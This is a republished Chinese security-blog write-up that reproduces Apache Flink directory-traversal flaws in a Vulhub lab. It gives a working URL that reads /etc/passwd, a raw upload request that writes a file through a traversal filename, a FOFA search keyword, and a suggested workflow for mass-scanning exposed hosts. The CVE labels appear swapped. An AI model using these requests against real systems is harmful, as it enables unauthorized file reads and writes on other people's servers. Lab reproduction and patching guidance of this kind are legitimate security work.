专栏首页乌鸦安全Apache Flink目录遍历漏洞(REST API读/写远程文件)

Apache Flink目录遍历漏洞(REST API读/写远程文件)

CVE-2020-17518复现

0x01 漏洞描述

Apache Flink目录遍历漏洞,可通过REST API读/写远程文件

0x02 影响版本

Flink 1.5.1-1.11.2

0x03 复现过程

  1. 通过Vulhub复现:

下载链接:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

用dcker-cmose配置关环境docker-compo

2. 使用docker-compose配置相关环境docker-compose up -d

3. 运行docker ps查看当前环境

4. 浏览器访问http://127.0.0.1:8081/

5. 构造exp:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

6. 清理环境

docker-compose down

0x04 fofa关键字

app="APACHE-Flink"

CVE-2020-17519复现

0x05 构造数据包

复现步骤与18相同,直接构造数据包

POST /jars/upload HTTP/1.1
Host: 127001:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187


------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"


success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

返回400

直接访问:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

0x06 修复建议

直接升级到安全版本 Flink 1.11.3或Flink 1.12.0

0x07 批量脚本编写思路

  1. 先fofa+shodan刷一波,去重
  2. 构造相关exp脚本进行测试即可
  3. 脚本构造很简单,基本没啥难度,在这里就不提供了,太忙了

本文分享自微信公众号 - 乌鸦安全(crowsec),作者:crow

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-01-07

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CVE-2020-17518&17519:Flink两个漏洞复现

    Apache Flink 是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方...

    Timeline Sec
  • Flink1.7发布中的新功能

    Apache Flink 社区正式宣布 Apache Flink 1.7.0 发布。最新版本包括解决了420多个问题以及令人兴奋的新增功能,我们将在本文进行描述...

    smartsi
  • Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

    Timeline Sec
  • Flink1.7稳定版发布:新增功能为企业生产带来哪些好处

    问题导读 1.Flink1.7开始支持Scala哪个版本? 2.Flink1.7状态演变在实际生产中有什么好处? 3.支持SQL/Table API中的富集连接...

    用户1410343
  • Apache Flink CVE-2020-17519复现及历史漏洞合集

    近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本) 但是作者通过测试...

    用户1631416
  • 安全漏洞公告

    Apache Roller OGNL表达式注入远程代码执行漏洞发布时间:2013-11-27漏洞编号:BUGTRAQ ID: 63928 CVE(CAN...

    安恒信息
  • 挖洞经验 | 开放重定向漏洞导致的账户劫持

    最近,在测试目标网站https://target.com的过程中,作者通过综合其Web应用存在的开放重定向、路径遍历和CSRF漏洞,最终实现了账户劫持。

    FB客服
  • Web中间件常见漏洞总结

    IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联...

    FB客服
  • 端口漏洞全集

    web漏洞挖腻了?到客户现场找不到web漏洞?不然来试试各个端口中存在的漏洞吧。以下是本人在项目中整理的端口漏洞合计,可能不是很全欢迎各位大佬补充。

    Khan安全团队
  • 2020护网期间公布漏洞总结-附部分漏洞Poc,Exp

    4.Apache DolphinScheduler远程代码执行漏洞(CVE-2020-11974),危害级别:危急,官方已发布补丁

    Gamma实验室
  • Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052(CVE-2017-9805)

    漏 洞 概 述 1. 漏洞信息: 2017年9月5日,Apache Struts 发布最新安全公告。Apache Struts2 的 REST 插件存在远程...

    Seebug漏洞平台
  • HUNT:一款可提升漏洞扫描能力的BurpSuite漏洞扫描插件

    今天给大家介绍的是一款BurpSuite插件,这款插件名叫HUNT。它不仅可以识别指定漏洞类型的常见攻击参数,而且还可以在BurpSuite中组织测试方法。 ?...

    FB客服
  • Uber服务端响应中的API调用缺陷导致的账户劫持

    今天分享的writeup是香港白帽Ron Chan (@ngalongc)发现的一个关于Uber网站的漏洞,他通过分析Uber的微服务架构和其中的API调用机制...

    FB客服
  • Struts2 S2-052 RCE简单测试

    本文由玄魂和 方块K 合写。 ---- 不太愿意跟风写类似的文章,网友“方块K” 投了一篇相关文章过来,但是略显简略,我重新进行了扩展。 参考了网上的相关文章,...

    用户1631416
  • 框架安全之Shiro渗透复现

    Apache Shiro是一个强大且易用的Java安全框架,用于身份验证、授权、密码和会话管理,具有以下特点:

    FB客服
  • 木马围城:比特币爆涨刺激挖矿木马一拥而上围猎肉鸡资源

    云主机是企业数字化转型的重要基础设施,承载着重要的数据和服务价值,也逐渐成为了黑客的重点攻击对象。随着虚拟机、云主机、容器等技术的普遍应用,传统安全边界逐渐模糊...

    Kendiv
  • 刚修完 Jackson 漏洞,又要修 FastJson 漏洞,我太难了

    前段时间频繁的爆出 Jackson 漏洞,前天刚修复完升级好了,第二天又要接着修复?,简直了。那一波涉及的东西还挺多,不仅仅应用升级,像 ElasticSear...

    zhisheng
  • 这可能是最全的入门Web安全路线规划

    本次写的是一篇如何通过针对性系统学习Web安全或者说如何能成为一名渗透测试人员(有疑问或者错误的地方还望大家多多指正)。

    Gcow安全团队
  • 开源BUG跟踪平台JIRA目录遍历漏洞分析

    作者 Taskiller 最近,一则新发布的公告报告了一个影响Jira 5.0.11和6.0.3版本的目录遍历漏洞,该漏洞在去年7月份被验证,并在接下来的几个月...

    FB客服

扫码关注云+社区

领取腾讯云代金券